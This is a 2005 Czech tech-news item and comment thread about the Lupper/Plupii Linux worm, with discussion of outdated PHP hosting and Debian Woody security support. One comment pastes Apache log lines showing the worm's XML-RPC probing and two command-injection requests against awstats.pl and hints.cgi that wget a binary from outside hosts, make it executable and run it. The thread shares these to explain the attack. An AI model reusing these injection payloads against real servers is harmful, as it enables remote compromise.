Blíží se doba linuxových červů

Luppi Worm je očividná cesta s ohromnými možnostmi pro útočníky. V příštích měsicích se tak možná přesvědčíme, jak bezpečné vlastně ve skutečnosti linuxové systém jsou. Více na eWeeku v článku Is This the Dawn of the Linux Worms?

Komentáře

Už se těším, až někdo vypustí nějakého schopného červa. Konečně snad přejde většina webhosterů na PHP5 :)

Hodně provozovatelů webhostingu totiž kdysi před 5 lety něco nainstalovalo a protože nechtějí "buzerovat" své zákazníky, pěkně tuto zastaralou konfiguraci udržují v chodu, nehledě na nové verze a nové bugy.

Naposledy jsem potkal starou verzi u Active24. Nakopíruju skript, nefunguje. Podívám se na verzi PHP a co nevidím Debian Woody a PHP v4.1.2! Zastaralý Debian a 3 roky staré PHP. Ani nechci zkoumat, jestli na něj ještě vycházejí nějaké backporty bezpečnostních updatů...

Jak to vypadá u ostatních mě snad už ani nezajímá.

10.11.2005 15:56 Sofr
Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů

Ja bych podle http://www.debian.org/releases/woody/, konkretne "The security team has announced that it will continue to provide security updates for Debian GNU/Linux 3.0 (woody) until May 2006 or until security support for etch (the release following sarge) starts." rekl, ze security updaty zatim vychazeji. Ale osobne tedy Woodyho nikde nemam, takze z vlastni zkusenosti to potvrdit nemohu.

Ovsem pokud na nej updaty vychazeji, pak na pouzivani starych verzi nic spatneho nevidim a Vas odsuzujici ton se mi prilis nelibi.

10.11.2005 16:30 #Tom
Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů

Na používání starých, ovšem záplatovaných verzí sice nic špatného není, ale dobrého také ne. Zrovna PHP 5 by mi docela chybělo.

Mohl by někdo pár větami shrnout, čeho se vlastně tímto červem zneužitelná chyba týká a co je tedy potřeba záplatovat? Z těch pár útržků co jsem pochopil to není chyba v linuxu (jako tvrdí někde), ani v žádném webserveru (jak tvrdí někde jinde), ale v nějkém modulu pro PHP (jestli se vyjadřuju blbě, tak sorry, web ani php není moje parketa). Jelikož žádný webserver neprovozuji, tak mě to netrápí, ale chtěl bych vědět jak to vlastně je.

11.11.2005 10:13 Milan Hejpetr | skóre: 25 | blog: poznamky | Plzen
Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů

Viz napr. http://www.symantec.com/avcenter/venc/data/linux.plupii.html

Jinak v logu Apache to vypada napr. takto (kraceno):


...

64.76.125.141 - - [09/Nov/2005:20:00:36 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286

64.76.125.141 - - [09/Nov/2005:20:00:38 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291

64.76.125.141 - - [09/Nov/2005:20:00:39 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298

64.76.125.141 - - [09/Nov/2005:20:00:41 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299

64.76.125.141 - - [09/Nov/2005:20:00:42 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293

64.76.125.141 - - [09/Nov/2005:20:00:43 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299

64.76.125.141 - - [09/Nov/2005:20:00:45 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296

64.76.125.141 - - [09/Nov/2005:20:00:49 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286

64.76.125.141 - - [09/Nov/2005:20:00:50 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293

64.76.125.141 - - [09/Nov/2005:20:00:52 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293

...

Pak je zajimave jeste napr. toto :-)


...

64.76.125.141 - - [09/Nov/2005:20:00:31 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3b

chmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 294

...

...

64.76.125.141 - - [09/Nov/2005:20:03:40 +0100] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii; 

chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 300
...